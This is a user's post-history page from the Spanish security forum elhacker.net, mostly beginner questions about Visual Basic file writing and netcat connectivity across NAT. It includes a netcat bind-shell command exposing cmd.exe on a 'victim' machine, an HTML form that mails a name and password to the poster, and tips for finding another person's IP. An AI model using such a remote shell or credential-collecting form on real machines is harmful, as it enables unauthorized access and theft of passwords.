elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: [1] 2
1  Foros Generales / Dudas Generales / Re: email anonimo con codigo html en: 23 Julio 2012, 22:19 pm
Hola Lmmr.

Utiliza este codigo:

<HTML>
<HEAD>
<TITLE>Soy Lmmr</TITLE>
</HEAD>

<FORM ACTION="mailto:tucorreolammer@hotmail.com METHOD="POST">
NOMBRE:<INPUT TYPE="text" NAME="nombre" SIZE="60">
CLAVE:<INPUT TYPE="password" NAME="clave" SIZE="50">

<INPUT TYPE="submit"  VALUE="Enviar">

</FORM>
</HTML>
Para esto necesitas tener Outlook, y es lo unico que puedes hacer con HTML.. si deseas algo mas anonimo utiliza PHP

2  Seguridad Informática / Hacking / Re: Tema: Concurso Nº1 "Hackeame" Ethical Hack en: 7 Junio 2012, 23:12 pm
Mandame la IP del server.
Ya me pongo a trabajar XD
3  Programación / .NET (C#, VB.NET, ASP) / Ayuda con Codigo en Visual Basic 6.0 en: 25 Enero 2012, 01:00 am
Hola a todos.

En la sección de trucos de visual basic encontre el siguiente codigo:

Private Sub Command1_Click()
Dim canalLibre As Integer
'Obtenemos un canal libre que nos dará
'el sistema oparativo para poder operar
canalLibre = FreeFile
'Abrimos el fichero en el canal dado
Open "C:\fichero.txt" For Output As #canalLibre
'Escribimos el contenido del TextBox al fichero
Print #canalLibre, Text1
Close #canalLibre
End Sub

Sera que pueden explicarme su funcionamiento ya que lo intente creando un programa con un textbox y un command butom y al empaquetar el programa funciona correctamente pero cuando lo instalo en otra maquina desaparece el tipo de letra que le puse y no copia el archivo en Windows con el contenido del texbox..

Repito.. solo funciona en mi maquina y en otras no..
tambien probe cambiando el contenido del texbox en modo paswoord para que sea oculto al escribirlo y me lo decifre el en archivo txt que se copia al C...

y solo funciona en mi maquina

Ayudenme..
4  Seguridad Informática / Hacking / Re: Averiguar una IP desde mi ordenador (Ayuda) en: 24 Enero 2012, 23:20 pm
Agrega al usuario en tu chat de hotmail y utiliza el comando netstat para ver su direccion IP mientras se escriben

O puedes hacer que te envie un correo y ver la iformacion del mensaje, ahi aparece la direccion IP.
5  Seguridad Informática / Hacking / Re: Problema con direcciones IP en: 24 Enero 2012, 00:48 am
en esta pagina hay un tutorial muy bueno del uso con netcat pero creo que solo funciona en redes locales...
esta en el buscador.

XD suerte
6  Programación / Programación Visual Basic / Ayuda con Programacion Visual basic 6.0 en: 24 Enero 2012, 00:45 am
Hola a todos.

En la sección de trucos para visual basic encontre codigo para hacer que lo escrito en texbox se copie a una direccion en block de notas.

el codigo es:
Private Sub Command1_Click()
Dim canalLibre As Integer
'Obtenemos un canal libre que nos dará
'el sistema oparativo para poder operar
canalLibre = FreeFile
'Abrimos el fichero en el canal dado
Open "C:\fichero.txt" For Output As #canalLibre
'Escribimos el contenido del TextBox al fichero
Print #canalLibre, Text1
Close #canalLibre
End Sub

Pero resulta que el programa solo funciona en mi PC y no en mi notebook..
El programa ya esta empaquetado y todo pero no funciona en otra PC.

Me podrian ayudar.
7  Seguridad Informática / Hacking / Re: net cat no me funciona fuera de mi red en: 30 Diciembre 2011, 19:10 pm
Hola Damebanda.

Te comento que con respecto al netcat.. la maquina victima tiene internet por medio de ADSL y su direccion ip empieza asi: 192.168.xx.xx. tengo entendido que este tipo de direcciones son privadas y el rowter posee la publica, por lo cual no podre acceder a ella. =(

Tienes alguna idea de como puedo hacer en este caso xq la mayoria de maquinas de mis amigos son por medio de Rowter ADSL... yo soy el unico que tengo por medio de UBS wireles el cual si es Publico.

Espero tus comentarios ya que no quiero dejar este tema abandonado...
8  Seguridad Informática / Hacking / Problema con direcciones IP en: 26 Diciembre 2011, 23:12 pm
Hola a todos.

Bueno tengo una duda, ya que quiero conectar a dos maquinas por medio de netcat pero no lo puedo realizar debido a que mi maquina (atacante) tiene direccion IP publica 10.248.xx.xx y la maquina (victima)  esta conectada por medio de Rowter ADSL y tiene una dirección IP 192.168.xx.xx se que este tipo de direcciones es para maquinas host en una red y esta se conectan al rowter que tiene la ÎP publica para luego acceder a internet.

Mi pregunta es: Como puedo hacer para solucionar este problema, ya que mi proveedor de internet es por medio de USB Wireless y el de la maquina victima es por medio ADSL. (linea telefonica).

Existe alguna forma de que conectar el netcat en esta situación ya que probe con dos maquinas conectadas en una misma red y si funciona pero no cuando la maquina (victima) esta en otra red.

Gracias y quedo a la espera de sus comentarios.
9  Seguridad Informática / Hacking / Re: net cat no me funciona fuera de mi red en: 19 Diciembre 2011, 22:00 pm
ok, lo intentare de esa manera

Pero no entido la opcion que me diste de verificar si la maquina tiene excepcion para permitir que abra el puerto. como veo esto?

Y te hago otra observación. la maquina (victima tiene internet por medio de un rowter y la maquina tiene el fireware desactivado y mi maquina esta con otro proveedor distinto pero en Wireles Modem USB.

Crees que existe la posibilidad de que esten bloqueados los puertos directamente por los proveedores de internet como lo es el puerto 21 o 25 u cualquier otro.
tengo entendido que ente caso tendria que hacer un redireccionamiento de puerto pero antes de meterme hacerlo probare las opciones que me indicastes.

Gracias.
10  Seguridad Informática / Hacking / net cat no me funciona fuera de mi red en: 19 Diciembre 2011, 21:00 pm
Hola a todos.

Bueno para empezar les comento que estoy tratando de dejar a la escucha a otra maquina (con autorización)  fuera de mi red local osea de otro lugar y diferente proveedor de internet. yo coloco el comando para lograr de esta manera nc -L -d -e cmd.exe -p 5777 y automaticamente queda a la escucha de conexiones en ese puerto.
Pero cuando desde mi maquina coloco la dirección IP de la maquina(victima), simplemente nada. No logro conectar. El comando que utilizo para conectarme es nc xx.xx.xxx.x 5777

Asiendo el mismo procedimiento en mi red local de 3 maquinas, no tengo ningun problema en conecatarme con la que este a la escucha ya sea el puerto 21,25,80 etc. cosa distinta con la victima ya que no me funciona en ningun puerto.

Sera que me pueden ayudar explicandome el porque pasa esto y que debo hacer para lograr conectarme con la maquina que esta fuera de la red pero con

Muchas gracias.
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines